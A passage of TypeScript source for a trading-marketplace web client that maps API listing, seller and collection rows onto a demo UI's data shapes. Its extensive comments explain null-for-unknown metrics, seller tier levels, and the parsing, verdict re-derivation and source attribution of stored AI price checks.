   *  fabricated 0. Card 1218203357125435 (Tyler's ruling, card
   *  1218202996944129): a real zero and "we don't know" are different facts,
   *  and only null can carry the second one. Every render site formats null
   *  as UNKNOWN_METRIC ("—", data.js) rather than printing the literal word
   *  "null" or silently coercing it back to 0. See this interface's own
   *  producers below for which of the four fields each one can actually
   *  answer. */
  trades: number | null;
  sales: number | null;
  bio: string;
  followers: number | null;
  following: number | null;
  ratings: number;
  badges: string[];
  lvl: number;
  /** Whether `lvl` is inside the seller's real band: it came from real lifetime
   *  points, or — the number withheld by "Show Points" — it is the floor of the
   *  gem the server named (gemTier; card 1219077706989065). false on rows whose
   *  producer has neither on the wire, so app.js prints no tier for them
   *  (tierLabel) rather than the EMERALD a hard-coded 1 would name. Absent on
   *  data.js's hand-written rows, which carry hand-picked levels. */
  lvlKnown?: boolean;
  /* ── The five gamification fields, added 2026-08-24. ───────────────────────
     Blake's own USERS fixture carries all five and three of our renderers
     dereference them WITHOUT a guard, so omitting them is not a blank cell,
     it is a thrown TypeError that returns nothing from the render function —
     which leaves app.innerHTML unassigned and the previous view painted with
     dead controls. Measured by running his real renderProfile/renderWallet
     against this mapper's output:

       renderWallet   app.js:2914  u.pts.toLocaleString()      TypeError
       renderProfile  app.js:1154  u.points.toUpperCase()      TypeError
       renderRepDash  app.js:1447  u.pts.toLocaleString()      TypeError

     pinned is the exception: both its readers guard with (u.pinned || []), so
     it is carried for shape rather than to stop a crash.

     For a seller row these are honest zeros — GET /api/listings carries no
     points data for the people on the floor, and none of the three renderers
     above ever runs for anyone but the SIGNED-IN user. installWallet() below
     overwrites them with real values for that one user. */
  pts: number;
  ptsNext: number;
  streak: number;
  /** Blake renders this pre-formatted, "1,450 pts" — renderProfile:1154 calls
   *  .toUpperCase() on it, so it must be a string and never a number. */
  points: string;
  pinned: string[];
}

/** GAP LOG — every place this mapping does not have a 1:1 real field, named
 *  here instead of papered over with a plausible-looking default:
 *
 *  - image / images[] / avatar: security-critical, see safeUrl() above, not
 *    a data-completeness gap.
 *  - declaredValue: Blake's `l.declaredValue` is the PRICE SHOWN
 *    (app.js:161, `money(l.declaredValue)` in the card price line), not
 *    "declared value" in our schema's sense — the two words mean different
 *    things on either side of this mapping. Every existing public page
 *    renders `Number(cashPrice ?? declaredValue ?? 0)` — browse.ts:107,
 *    storefront.ts:242, listing-og.ts:276 — so /web must use the same
 *    fallback or a cash listing shows a "SALE" chip beside a number that
 *    contradicts the /listing/:id page one click away (recon 21, V6).
 *    `?? 0` is dropped from the mirror because those three read a nullable
 *    column while listings.declared_value is notNull (schema/listings.ts:28),
 *    so the fallback here can never land on null.
 *  - description: on the wire (listings.description, nullable text) but was
 *    missing from this file's own type, not from the API — mapped as
 *    `description ?? ""`. Blank, not fabricated.
 *  - condition: on the wire (listings.condition, a notNull pgEnum defaulted
 *    to "good") — always populated by the DB, no fallback needed.
 *  - comments / commentCount: NOT returned by GET /api/listings at all — left
 *    as []/0 HERE, on every grid card, because real comments live behind
 *    GET /api/comments/:listingId, a per-listing call recon 15 §3 Tier 1
 *    already flags as too expensive to do once per grid card (one call per
 *    row, and the floor holds every active listing). That reasoning is scoped to the GRID: on the single
 *    #/listing/:id detail page one click away, it's ONE call for ONE
 *    listing, so installLiveListingComments below fetches the real thing
 *    lazily, per navigation, and mutates this exact row in place — see its
 *    own header for why that isn't part of this synchronous mapping.
 *  - buzzing: Blake's own merchandising flag has no backing column. Mapped
 *    to the real listings.isFeatured column — not invented: the live
 *    GET /api/listings handler already orders by desc(isFeatured) as its own
 *    promotion signal, so this reuses an existing real concept rather than
 *    fabricating a new one.
 *  - want ("LOOKING-FOR MATCH" chip): only ever set from the API's
 *    matchesViewerWant, which the server only computes for an authenticated
 *    viewer with saved wants. Guests correctly get undefined (chip absent),
 *    which matches server behavior exactly rather than defaulting to a
 *    value.
 *  - seller level: Blake's USERS entries carry a hand-picked 6-tier gem name
 *    (Emerald..Diamond, data.js TIERS/tierOfLvl). The real
 *    users.trader_level column is a DIFFERENT, unrelated 3-value enum
 *    (rookie/verified/hall_of_fame — schema/users.ts:3). A THIRD system,
 *    lib/bazaar-levels' getTraderTier(), returns yet another vocabulary
 *    (Merchant/Magnate/Mogul) and isn't even wired to this column. None of
 *    the three agree, and picking a winner is a product decision, not a
 *    Phase 1 call — so this passes the real traderLevel value through
 *    VERBATIM ("rookie" etc.) rather than computing a fake gem-tier name.
 *    RULED SINCE (Nick, card 1217901376680748; Blake 2026-09-09 #1): every
 *    renderer reads the GEM tier from tierOfLvl(u.lvl) and never this word —
 *    the detail seller card, the public profile chip, the thread head and the
 *    message rail all do now (the card overlay printed a tier until 2026-09-10,
 *    when the tier came off the feed card). `level` still carries the
 *    enum verbatim for anything that wants the raw value; nothing on screen
 *    prints it.
 *  - seller lvl (numeric, the input to tierOfLvl() everywhere a tier shows):
 *    getLevelFromPoints(totalAccumulatedPoints) — the real level from the
 *    real points the route sends for exactly this (listings.ts:415-418; see
 *    levelFromPoints.ts for why it is a mirror). Was a hard-coded 1 until
 *    2026-09-09, which read as EMERALD on every seller. Absent points → 1.
 *    lvlKnown records whether the level is inside the seller's real band: true
 *    for a seller row that carried points; true for one that carried gemTier
 *    without them — the "Show Points" strip, where lvl is then that band's
 *    floor (card 1219077706989065); false for the three producers that carry
 *    neither (deal counterparts, comment authors, collection owners), which
 *    keep lvl: 1 for arithmetic and print no tier (app.js tierLabel).
 *  - seller initials: no such column exists for any of the three level
 *    systems above. Derived mechanically from displayName ?? username
 *    (first 2 chars, upper-cased) — a deterministic fallback, not a guess.
 *  - seller memberSince: CLOSED 2026-08-26, and it should not have been
 *    grouped with `sales` in the first place. This entry used to read "GET
 *    /api/listings's seller sub-object doesn't return a join date" — true,
 *    and not a reason: users.createdAt is NOT NULL with a defaultNow() and
 *    was simply absent from two selects (GET /api/listings' `seller`, GET
 *    /api/feed/collection-items' `owner`). No ambiguity to rule on, one
 *    column, two lines. The pairing with `sales` made a cheap gap look as
 *    blocked as an expensive one for as long as they shared a bullet, and
 *    it reached a GUEST rail: renderTopCollections has no minimum-trades
 *    threshold, so a seller with nothing can occupy a slot and the card
 *    printed "Member Since " with nothing after it.
 *  - seller sales: STILL OPEN, and genuinely blocked. Recon 15 §3 Tier 2's
 *    "seller stats" entry documents THREE real, disagreeing implementations
 *    of "sales" — picking one would be exactly the kind of invented-looking
 *    value this file is supposed to avoid. Card 1218202996944129 (Tyler's
 *    ruling): render the honest unknown rather than wait on that pick — so
 *    this is `sales: null`, not `sales: 0`. A real zero and "we haven't
 *    picked a definition yet" are different facts, and 0 could only ever
 *    tell you the first one.
 *  - seller trades: recon 16 (L4-5) — this one WAS on the wire
 *    (BaseRow.seller.tradeCount) and simply missing from this file's own
 *    type, unlike sales. Fixed: `trades: seller.tradeCount ?? 0`. The
 *    earlier "no single real number yet" justification did not apply to
 *    this field and should not have covered it.
 *  - seller bio / followers / following / ratings / badges: not fetched by
 *    this endpoint at all (would need GET /api/users/:id and
 *    GET /api/users/:id/followers|following separately — out of scope for
 *    one surface). "" / null / null / 0 / [] — bio and ratings stay honest
 *    blanks (there is no ambiguity in an empty bio or a zero rating count
 *    fetched from nowhere); followers/following are null, not 0, for the
 *    same reason sales is — profileFixups.ts fetches and patches the real
 *    counts per profile view, and until that lands "we don't know" must not
 *    look like a real zero. Never the literal word "undefined" either way.
 *  - the handle "blake": RETIRED 2026-09-04 (card 1218191737225315, Nick's
 *    ruling: no demo users on production marketplace surfaces). This mapper
 *    used to append a suffix to a real seller literally named "blake" for
 *    display, on the assumption app.js special-cased that literal username.
 *    Recon found the opposite: app.js contains ZERO comparisons against the
 *    literal "blake" — all 13 ownership/identity checks compare against
 *    store.me generically — so the rename was protecting against a
 *    collision that could not happen. A real seller named "blake" now keeps
 *    their own name, exactly like every other username (see the IDENTITY
 *    block near the top of the file for why a fixture persona and a real
 *    user can never be live at once).
 */

/** A seller's join date in Blake's "<Month> <Year>" shape, or the honest blank.
 *  Both absence paths land on "": no createdAt on the row (a cached page from
 *  before the column joined the select), and a createdAt the formatter cannot
 *  parse. Kept out of mapSellerToUser's return literal so both callers get the
 *  identical treatment and neither can drift into rendering an em dash. */
function sellerMemberSince(createdAt: string | null | undefined): string {
  if (!createdAt) return "";
  const text = formatMonthYear(createdAt);
  return text === EMPTY_DATE ? "" : text;
}

/** The USERS[handle] half of mapListingRow, factored out so
 *  mapCollectionItemRow can reuse it verbatim — recon's own finding is that
 *  GET /api/feed/collection-items's `owner` object maps field-for-field onto
 *  this SAME seller shape, so the two callers share one mapping rather than
 *  keeping two that could drift apart. */
function mapSellerToUser(seller: {
  /** Optional because this is also called from mapCollectionItemRow with
   *  ApiCollectionItemRow's `owner`. That owner DOES carry users.id on the wire
   *  (checked against staging 2026-09-10; the comment here used to say it did
   *  not), and installFloorListings now records it in userIds when the owner has
   *  no for-sale listing, so Message on a collection piece can address the
   *  thread. Falls back to "" for a row that somehow arrives without one. */
  id?: string;
  username: string;
  displayName: string | null;
  avatar: string | null;
  traderLevel: string | null;
  tradeCount: number | null;
  totalAccumulatedPoints?: number | null;
  gemTier?: string | null;
  createdAt?: string | null;
}): DemoUser {
  const displayHandle = seller.username;
  const pointsOnWire = typeof seller.totalAccumulatedPoints === "number";
  /* Consulted only when the number is withheld: points, when present, are the
     finer fact, and the gem the server named was computed from them anyway. */
  const tierFloor = pointsOnWire ? null : gemTierFloorLevel(seller.gemTier);
  return {
    id: seller.id ?? "",
    handle: displayHandle,
    avatar: safeUrl(seller.avatar) || undefined,
    initials: (seller.displayName || seller.username).slice(0, 2).toUpperCase(),
    level: seller.traderLevel ?? "",
    /* The real join date, formatted to Blake's own two-token "<Month> <Year>"
       shape — see formatMonthYear for why full month and why exactly two
       tokens. Falls back to "" and NOT to EMPTY_DATE's em dash on any absence:
       "" is the honest blank this field carried before it had a source, and it
       is what his `"".split(" ").pop()` already renders safely. An em dash
       would put a mark on the card claiming a join date exists but is unknown,
       which is a different (and false) claim. */
    memberSince: sellerMemberSince(seller.createdAt),
    trades: seller.tradeCount ?? 0,
    /* HONEST UNKNOWN, not an honest zero — Tyler's ruling (card
       1218202996944129): sales has no source (see the GAP LOG's "seller
       sales" entry below — three disagreeing real definitions, picking one
       is a product call this file still isn't making) and followers/
       following are real counts profileFixups.ts fetches per-profile-view,
       not at floor-boot time. Rendering 0 for "we don't know" is
       indistinguishable from a real zero; null renders as "—" (UNKNOWN_METRIC,
       data.js) at every call site instead. profileFixups.ts's
       patchProfileStats upgrades followers/following the moment a real count
       is fetched for the handle being viewed; nothing upgrades sales yet. */
    sales: null,
    bio: "",
    followers: null,
    following: null,
    ratings: 0,
    badges: [],
    /* The real level, from the real points. GET /api/listings sends the seller's
       totalAccumulatedPoints precisely so the client can compute this
       (listings.ts:415-418), the way mobile's TraderBadge does. Until 2026-09-09
       this was a hard-coded 1, which put EMERALD on every seller's tier read
       regardless of standing (the card overlay then; the seller card and profile
       chip now) — beside the raw trader_level word ("rookie") the overlay also
       printed (Blake 2026-09-09 #1).

       Points WITHHELD but the gem named (card 1219077706989065): a seller whose
       "Show Points" is off arrives with gemTier and no totalAccumulatedPoints —
       toPublicSeller (api-server lib/serializers.ts) names the gem from the
       points BEFORE it strips them, so the tier is still a fact the server
       stated (Tyler's ruling 2026-09-27, card 1218405950784016: the toggle
       hides the NUMBER and keeps the tier). The level is then that band's
       floor: the least level that still reads as the stated gem through
       tierOfLvl, which is the ONLY thing a seller row's lvl ever feeds —
       "Level N of 60" prints for USERS[store.me] alone (renderRepDash,
       renderWallet), whose own wallet overwrites it (installWallet). The
       number stays withheld: pts/points below are the same zeros as every
       seller row, and nothing prints them for anyone but the signed-in viewer.

       Neither on the wire (an older cached page; the collection-items `owner`,
       which carries none) falls to level 1, not 0: levels run 1-60 and
       tierOfLvl() (data.js:18) matches on 'lvl >= t.min' with a first tier of
       1, so a 0 misses every tier, falls through to '|| TIERS[0]', and prints
       the literal "Level 0 of 60", which is not a level anyone can be. */
    lvl: pointsOnWire ? getLevelFromPoints(seller.totalAccumulatedPoints) : tierFloor ?? 1,
    /* A tier is only named for a level inside the seller's real band (app.js
       tierLabel): from points, or from the gem the server named when it
       withheld them. GET /api/listings carries both; GET /api/feed/
       collection-items' owner carries neither, and a collection owner with no
       live listing reads no tier. A gemTier outside the six-gem vocabulary
       names no band and no tier — never a made-up Emerald. */
    lvlKnown: pointsOnWire || tierFloor !== null,
    pts: 0,
    ptsNext: 0,
    streak: 0,
    points: "0 pts",
    pinned: [],
  };
}

/* ============================================================================
 * THE PRICE CHECK — retiring app.js:824's fabricated verdict.
 *
 * What is being replaced: renderDetail computes
 *
 *   const pc = l.collectionOnly ? null : (l.priceCheck || {
 *     min: round(declaredValue * 0.85), max: round(declaredValue * 1.15),
 *     confidence: "HIGH CONFIDENCE", verdict: "PRICED FAIR",
 *     reasoning: `Comparable pieces cleared between $X and $Y in the last 90
 *                 days. The ask sits right in the pocket.`,
 *   });
 *
 * — a ±15% band around the seller's own asking price, dressed as a market
 * finding, asserted at HIGH CONFIDENCE, over 101 real listings, on one guest
 * click. No fixture row has `priceCheck`, so the fallback is the only branch
 * that has ever run.
 *
 * There is a real answer to substitute, and it arrives two ways:
 *
 *  1. STORED, free, no auth. The listings row carries `aiVerdictReason`,
 *     which runPriceVerify writes as JSON (priceVerifier.ts:447-455) for the
 *     shipped mobile client to parse.
 *  2. ON DEMAND, authed. POST /api/listings/price-verify (requireAuth +
 *     priceVerifyLimiter, mounted under /listings — routes/index.ts:92, so
 *     the bare /api/price-verify path 404s) returns the same object live and
 *     persists it. See installPriceCheckRun.
 * ==========================================================================*/

/** The stored/returned price-check JSON, as written by priceVerifier.ts:447.
 *  Every field is optional or unknown here on purpose — this type describes
 *  BYTES WE DID NOT WRITE, and the whole job of toDemoPriceCheck below is to
 *  decide whether they are a price check at all. */
interface WirePriceCheck {
  min?: unknown;
  max?: unknown;
  confidence?: unknown;
  reasoning?: unknown;
  verdict?: unknown;
  grounded?: unknown;
  sources?: unknown;
}

/** API enum -> the display strings Blake's panel prints verbatim.
 *
 *  Both maps are read off his own markup and mobile's, not invented: the
 *  confidence badge is `${confidence.toUpperCase()} CONFIDENCE` on mobile
 *  (app/listing/[id].tsx:658) and his fixture value "HIGH CONFIDENCE" is that
 *  string exactly. `.pc-verdict` is styled as a caps label (styles.css:971,
 *  letter-spacing .1em, 12px, 700) and his own literal is "PRICED FAIR", so
 *  the other three take the same terse caps register rather than mobile's
 *  sentence-style equivalents ("Great deal — well below market"), which are
 *  written for a different layout. Meaning is mobile's; register is Blake's. */
const PC_CONFIDENCE_LABELS: Readonly<Record<string, string>> = {
  low: "LOW CONFIDENCE",
  medium: "MEDIUM CONFIDENCE",
  high: "HIGH CONFIDENCE",
};

const PC_VERDICT_LABELS: Readonly<Record<string, string>> = {
  fair: "PRICED FAIR",
  overpriced: "OVERPRICED",
  underpriced: "UNDERPRICED",
  great_deal: "GREAT DEAL",
};

/**
 * The verdict is re-derived here rather than read out of the stored JSON, and
 * that is a correctness fix, not a stylistic one.
 *
 * The server's own rule (priceVerifier.ts:68-86, deriveVerdict): "The verdict
 * is a function of THIS caller's declared value against the market range — it
 * is not a property of the market range alone." A stored verdict was computed
 * against `listings.declared_value` AT THE MOMENT THE CHECK RAN.
 *
 * 🔴 THE STORED VERDICT GOES STALE, and that — not a cashPrice/declaredValue
 * mismatch — is what this function is for. A price edit does not re-run the
 * check or clear `aiVerdictReason`, so the row keeps a verdict describing a
 * price the listing no longer asks. Two live listings are in that state today:
 * each was checked, then re-priced upward out of its own stored band, and each
 * still carries "fair". Reading the stored verdict would print PRICED FAIR
 * beside a number sitting above the printed range, with the ask marker directly
 * over it (app.js:883) pointing past the band's right edge — the words and the
 * picture contradicting each other on one panel. Web's arithmetic is right and
 * the stored string is out of date.
 *
 * 🪤 AN EARLIER VERSION OF THIS COMMENT JUSTIFIED THE SAME CODE FALSELY. It
 * said `cashPrice` and `declaredValue` "differ routinely", so the panel's
 * number was not the one the verdict was derived against. Measured over 100
 * live rows: `cashPrice` is null on 98 and EQUAL to `declaredValue` on the
 * other 2. Divergence is zero. The mapper's `cashPrice ?? declaredValue` is
 * correct for its own reasons (price fidelity with the other public pages) and
 * is not a reason to re-derive anything.
 *
 * Deriving against the number actually on screen makes the panel
 * self-consistent by construction, whatever the row's history. Thresholds
 * mirror the server's exactly.
 */
export function derivePriceVerdict(price: number, min: number, max: number): string {
  if (price > max) return PC_VERDICT_LABELS.overpriced;
  if (price < min * 0.8) return PC_VERDICT_LABELS.great_deal;
  if (price < min) return PC_VERDICT_LABELS.underpriced;
  return PC_VERDICT_LABELS.fair;
}

/**
 * One already-parsed wire object -> Blake's display shape, or null.
 *
 * 🔴 THE GUARD IS THE POINT. `aiVerdictReason` is DUAL-USE: the same column
 * also holds plain status prose written by two other code paths —
 * "Queued for AI review" at listing creation (listings.ts:1034), "Queued for
 * re-review after seller photo replacement" (listings.ts:1899), "Missing
 * payload fields" (jobHandlers.ts:230) and `content_moderation_flag: <reason>`
 * (jobHandlers.ts:170). None of those is JSON, and a moderation flag reaching
 * a public price panel would be a disclosure bug on top of a rendering one.
 *
 * So the test is the same one the shipped mobile client applies
 * (mobile/lib/listings.ts:104 parseAiVerifiedRange): parse, then accept only
 * when BOTH min and max are actually numbers. Anything else — a throw, a
 * string, a null, a bare status sentence — returns null, and null means
 * Blake's honest pre-run state stands.
 *
 * `confidence` and `reasoning` fall back the way mobile's parser does
 * ("medium", ""). An UNRECOGNISED confidence additionally warns: the server
 * normalises to low|medium|high before persisting (priceVerifier.ts:111-115),
 * so anything else means the two have drifted and the drift should be audible
 * rather than silently displayed as MEDIUM.
 */
export function toDemoPriceCheck(raw: unknown, displayedPrice: number): DemoPriceCheck | null {
  if (!raw || typeof raw !== "object") return null;
  const wire = raw as WirePriceCheck;
  if (typeof wire.min !== "number" || typeof wire.max !== "number") return null;
  /* Beyond mobile's own two checks, and required by THIS renderer rather than
     by the data: Blake positions the ask marker with
     `(declaredValue - pc.min) / (pc.max - pc.min)` (app.js:883), so a
     non-finite bound or a degenerate min === max band emits
     `style="left:NaN%"` / `left:Infinity%`. The server already refuses to
     persist those (parseVerifyJson: min > 0 and max > min, priceVerifier.ts:
     94-101); this rejects a row that predates or bypassed that rule instead
     of painting a broken bar. */
  if (!Number.isFinite(wire.min) || !Number.isFinite(wire.max)) return null;
  if (wire.min <= 0 || wire.max <= wire.min) return null;

  const rawConfidence = typeof wire.confidence === "string" ? wire.confidence : "medium";
  const confidence = PC_CONFIDENCE_LABELS[rawConfidence];
  if (!confidence) {
    console.warn(
      `[web-install] price check: unrecognised confidence "${rawConfidence}" — the API normalises to ` +
        `low|medium|high (priceVerifier.ts:111), so this is drift. Showing MEDIUM CONFIDENCE.`,
    );
  }

  return {
    min: wire.min,
    max: wire.max,
    confidence: confidence ?? PC_CONFIDENCE_LABELS.medium,
    verdict: derivePriceVerdict(displayedPrice, wire.min, wire.max),
    reasoning: typeof wire.reasoning === "string" ? wire.reasoning : "",
    /* Carried, not coerced. A non-boolean (including a MISSING key on a row
       persisted before the server sent the flag) stays `undefined`, which
       priceCheckAttributionLabel reads as "unknown" rather than as "no market
       data" — see its `=== false`. */
    grounded: typeof wire.grounded === "boolean" ? wire.grounded : undefined,
    /* Every element must be a string, because the label joins them into a text
       node. A mixed array is model output that has drifted from its own
       contract, and dropping the non-strings quietly would print a shorter
       source list than the check actually had — so the whole field is dropped
       and the panel says nothing about sources at all. */
    sources: Array.isArray(wire.sources) && wire.sources.every((s) => typeof s === "string")
      ? (wire.sources as string[])
      : undefined,
  };
}

/**
 * THE ATTRIBUTION LINE — ported from mobile, not re-invented.
 *
 * Mobile's `lib/priceCheckAttribution.ts` exists because two surfaces
 * disagreeing about one price check WAS A FILED BUG (74b5c619, alexisr, p2:
 * "Price check data during list setup differs from price check conducted within
 * visible listing within minutes of posting. It appears to pull from different
 * sources."). It never pulled from different sources: `priceVerifier.ts` races
 * the market search against a timeout, and on a miss the estimate proceeds
 * UNGROUNDED — the model prices from memory. Each surface rendered `Sources:`
 * purely on presence, so an ungrounded run showed nothing, which is
 * indistinguishable from a grounded run that cited nothing. Its header states
 * the ruling: the two surfaces disagreeing is the bug, so the rule lives in one
 * place and both read it.
 *
 * WEB IS NOW THE THIRD SURFACE, and it was the loudest one: with `grounded`
 * dropped, an ungrounded estimate painted as a market finding at LOW/MEDIUM/HIGH
 * CONFIDENCE on real listings, guest-reachable, with nothing saying the market
 * lookup had failed.
 *
 * 🔑 A COPY, WITH A GUARD, NOT AN IMPORT. `artifacts/mobile` and
 * `artifacts/support` are separate TypeScript projects with separate tsconfigs
 * (scripts/gate.mjs typechecks them independently), so there is no import path
 * between them. The strings below are therefore MIRRORED — and pinned to
 * mobile's file by a source guard in demoPriceCheckPanel.test.ts, which reads
 * `mobile/lib/priceCheckAttribution.ts` and fails if either literal drifts. A
 * paraphrase would recreate bug 74b5c619 on a new pair of surfaces.
 *
 * 📌 PLAIN TEXT, NEVER AN HREF, and that is mobile's choice too: `sources` is
 * `[<marketplace names>]` per the model contract (priceVerifier.ts:228) and
 * `listing/[id].tsx:702` renders the label in a <Text>, not a link. The web
 * render site writes it with textContent for the same reason.
 */
export const UNGROUNDED_LABEL = "Estimate only — couldn't reach live market data for this check";

export function priceCheckAttributionLabel(
  pc: { grounded?: boolean; sources?: string[] } | null | undefined,
): string | null {
  if (!pc) return null;
  // `=== false`, not `!grounded`. A result persisted before the server started
  // sending the flag leaves it undefined, and undefined means "unknown", not
  // "no market data" — labelling an old good check as ungrounded would be the
  // same dishonesty pointing the other way. (mobile's own comment, verbatim
  // reasoning, because the trap is identical here.)
  if (pc.grounded === false) return UNGROUNDED_LABEL;
  if (pc.sources && pc.sources.length > 0) return `Sources: ${pc.sources.join(" · ")}`;
  return null;
}

/**
 * WHERE THE ASK MARKER IS ALLOWED TO SIT, as a `left:` percentage.
 *
 * Blake's formula (app.js:883) is `((declaredValue - pc.min) / (pc.max - pc.min))
 * * 76 + 12`, and it assumed HIS band, which bracketed the ask by construction
 * (±15% around the seller's own number, so the dot always landed near 50%). Real
 * stored bands do not bracket the ask: measured over the live floor, 12 of the 53
 * auto-revealed rows produce a `left:` between -64% and 341%. `.pc-bar` has no
 * overflow rule and nothing in its ancestor chain clips, so the dot PAINTS in
 * unrelated page space — confirmed in Chromium, `elementFromPoint` returns it.
 *
 * 🔑 THE REPO ALREADY DECIDED THIS. `api-server/src/routes/listing-og.ts`'s
 * `priceCheckAskPct` — the SSR listing page, which survived its own adversarial
 * review — clamps the same formula into [4, 96]. These bounds are that
 * function's, to the digit, so the two surfaces cannot disagree about where the
 * same ask sits.
 *
 * WHY CLAMP AND NOT HIDE. The SSR page omits the marker only for `value > 0 ?
 * … : null` — a listing with NO asking price, where there is genuinely nothing
 * to plot. An off-band ask is the opposite case: the price IS stated, and
 * "beyond this end of the band" is a true and useful reading of it. Pinning the
 * dot to the edge says that; deleting the dot would withhold a fact the panel
 * already prints in words two lines below (the re-derived OVERPRICED /
 * GREAT DEAL verdict). Hiding would also make the two ends of the failure look
 * identical, and they are not.
 *
 * Returns null for a position that cannot be computed at all — a NaN/Infinity
 * `left:`, which is Blake's own fallback arithmetic on a zero-priced row. That
 * IS the SSR's omit case, and the caller removes the dot.
 */
export const PC_ASK_MIN_PCT = 4;
export const PC_ASK_MAX_PCT = 96;

export function clampAskPct(raw: number): number | null {
  if (!Number.isFinite(raw)) return null;
  return Math.max(PC_ASK_MIN_PCT, Math.min(PC_ASK_MAX_PCT, Math.round(raw)));
}

/** The stored half: `aiVerdictReason` -> Blake's display shape, or null.
 *  A parse failure is the EXPECTED case for the status prose documented on
 *  toDemoPriceCheck, so it is swallowed rather than warned about — the column
 *  legitimately holds non-JSON. */
export function parseStoredPriceCheck(
  aiVerdictReason: string | null | undefined,
  displayedPrice: number,
): DemoPriceCheck | null {
  if (!aiVerdictReason) return null;
  let parsed: unknown;
  try {
    parsed = JSON.parse(aiVerdictReason);
  } catch {
    return null;
  }
  return toDemoPriceCheck(parsed, displayedPrice);
}

/** The ONE reading of the stored Trade for: a comma-joined string on the wire (the wizard joins
 *  the picked labels with commas, and the Trade Portal splits on them), trimmed, blanks dropped.
 *  null, "" and a non-string all read as no entries. A label that itself contains a comma
 *  cannot round-trip through this column; that is the column's shape, said here, not hidden. */
export function splitTradeFor(v: unknown): string[] {
  if (typeof v !== "string") return [];
  const seen = new Set<string>();
  for (const part of v.split(",")) { const t = part.trim(); if (t) seen.add(t); }
  return [...seen];
}

export function mapListingRow(row: ApiListingRow): { listing: DemoListing; user: DemoUser } {
  const { listing } = row;
  const user = mapSellerToUser(row.seller);
  // The number the panel will actually print, hoisted so the verdict is
  // derived against it rather than against the row's declared_value — see
  // derivePriceVerdict for why those are not the same number.
  const displayedPrice = listing.cashPrice ?? listing.declaredValue;
  return {
    listing: {
      id: listing.id,
      title: listing.title,
      description: listing.description ?? "",
      condition: listing.condition,
      image: safeUrl(listing.images?.[0]),
      images: (listing.images ?? []).map(safeUrl).filter((u) => u.length > 0),
      // The PRICE, not the declared value — see the gap log entry above.
      declaredValue: displayedPrice,
      category: listing.category,
      createdAt: Number.isFinite(Date.parse(listing.createdAt ?? "")) ? Date.parse(listing.createdAt ?? "") : undefined,
      /* 🔑 `||`, NOT `??`, AND THAT IS THE WHOLE SUBTLETY.
         listings.subcategory is `text DEFAULT '' NOT NULL`, so an untagged
         legacy row arrives as the EMPTY STRING rather than null. `??` would
         pass that "" straight through as a value; `||` folds it to absent,
         which is what "this listing was never tagged" actually means.
         Measured 2026-08-30: 9 of 100 prod rows are in that state, 3 of them
         under `other` (Everything Else), which is composer-only triage and not
         browsable — so they were never going to reach a sub page regardless.

         🪤 DELIBERATELY DIFFERENT FROM THE ApiWant READER above, which maps
         `sub: r.subcategory ?? ""`. Not an oversight and not drift: a want's
         `sub` feeds MATCHING, where "" is a meaningful "unspecified"; a
         listing's feeds Blake's sub-page FILTER, where absent is the honest
         state and is what this mapper's own local convention already uses for
         `brand` and `priceCheck`. Both are falsy, so neither can match a real
         slug — the difference is which renderer contract each answers to.
         Do not "fix" one to match the other without reading both consumers. */
      subcategory: listing.subcategory || undefined,
      acceptsCash: listing.acceptsCash,
      acceptsItems: listing.acceptsItems,
      acceptsHybrid: listing.acceptsHybrid,
      seller: user.handle,
      fairVotes: listing.upvotes ?? 0,
      overVotes: listing.downvotes ?? 0,
      likes: listing.likes ?? 0,
      buzzing: !!listing.isFeatured,
      want: row.matchesViewerWant ? true : undefined,
      lookingFor: Array.isArray(row.sellerWantsItems)
        ? row.sellerWantsItems.filter((w): w is string => typeof w === "string" && w.trim().length > 0)
        : [],
      tradeFor: splitTradeFor(listing.exchangeFor),
      // Both on the wire (see ApiListingRow) but only meaningful together —
      // a grade string with no confirmed `graded` flag isn't a grade Blake's
      // UI should assert (app.js:858's chip reads BOTH grader and grade).
      brand: listing.brand ?? undefined,
      graded: listing.graded && listing.grader && listing.grade ? { grader: listing.grader, grade: listing.grade } : undefined,
      // `?? undefined` rather than `?? null`: absent is the state Blake's
      // renderer tests with `l.priceCheck ||`, and an absent key is what
      // makes the bridge's reveal loop skip this row so his honest pre-run
      // button stands.
      priceCheck: parseStoredPriceCheck(listing.aiVerdictReason, displayedPrice) ?? undefined,
      comments: [],
      commentCount: 0,
    },
    user,
  };
}

/** Minimal shape of one GET /api/feed/collection-items row
 *  (api-server/src/routes/feed-collections.ts:182-209 — the route's own
 *  docblock: "the contract the UI is written against"). `owner` is
 *  confirmed field-for-field identical to ApiListingRow's `seller` (id
 *  aside), which is why mapCollectionItemRow below reuses mapSellerToUser
 *  rather than a second implementation. */
export interface ApiCollectionItemRow {
  item: {
    id: string;
    title: string;
    description: string | null;
    images: string[];
    category: string;
    condition: string | null;
    /** null when the owner never estimated a value, or estimated 0 — see
     *  feed-collections.ts:194-197's own comment. Blake's card always shows
     *  SOME number here (app.js:161-162 renders money(l.declaredValue)
     *  unconditionally, collectionOnly or not — only the votes/CTA below it
     *  are gated), so this maps through `?? 0`, the same honest-zero
     *  convention mapListingRow's own gap log uses throughout. */
    estimatedValue: number | null;
  };
  owner: {
    /** users.id — on the wire (feed-collections.ts's owner select), and what the
     *  web's message sender needs to address a thread to a collection owner who
     *  has no for-sale listing on the floor. */
    id?: string;
    username: string;
    displayName: string | null;
    avatar: string | null;
    traderLevel: string | null;
    tradeCount: number | null;
    /** users.createdAt — see ApiListingRow.seller.createdAt. This endpoint has
     *  no cache in front of it, so the optionality here is only so the ONE
     *  shared seller mapping keeps one signature. */
    createdAt?: string | null;
  };
}

/**
 * Maps one collection-item row onto Blake's LISTINGS[] shape with
 * collectionOnly: true — the exact, already-built mechanism his own file
 * uses for "not for sale" pieces (data.js's own 3 collectionOnly fixture
 * rows; renderCard()/renderDetail() gate ALL of vote bars, accepts-chips,
 * the composer and the offer CTA on this ONE boolean, swapping in a
 * Message-only CTA instead — app.js:140-172, 823, 853, 861, 867, 908,
 * 919-920, 934, 972). No second "is this for sale" concept is introduced.
 *
 * Returns null for a category renderDetail can't resolve (see
 * RENDERABLE_CATEGORY_SLUGS) — a collection-only card links to
 * #/listing/:id exactly like a for-sale one (app.js's data-listing click
 * delegation doesn't distinguish them), so it is reachable by the same
 * unguarded CATEGORIES.find(...) crash the for-sale filter already guards.
 *
 * comments/commentCount/fairVotes/overVotes/likes/buzzing/want all stay at
 * their honest zero/empty/undefined defaults — a not-for-sale piece has no
 * comment thread, no price votes and no "buzzing" merchandising signal on
 * the wire at all (feed-collections.ts's own response shape has no such
 * fields), so there is nothing real to map them from.
 */
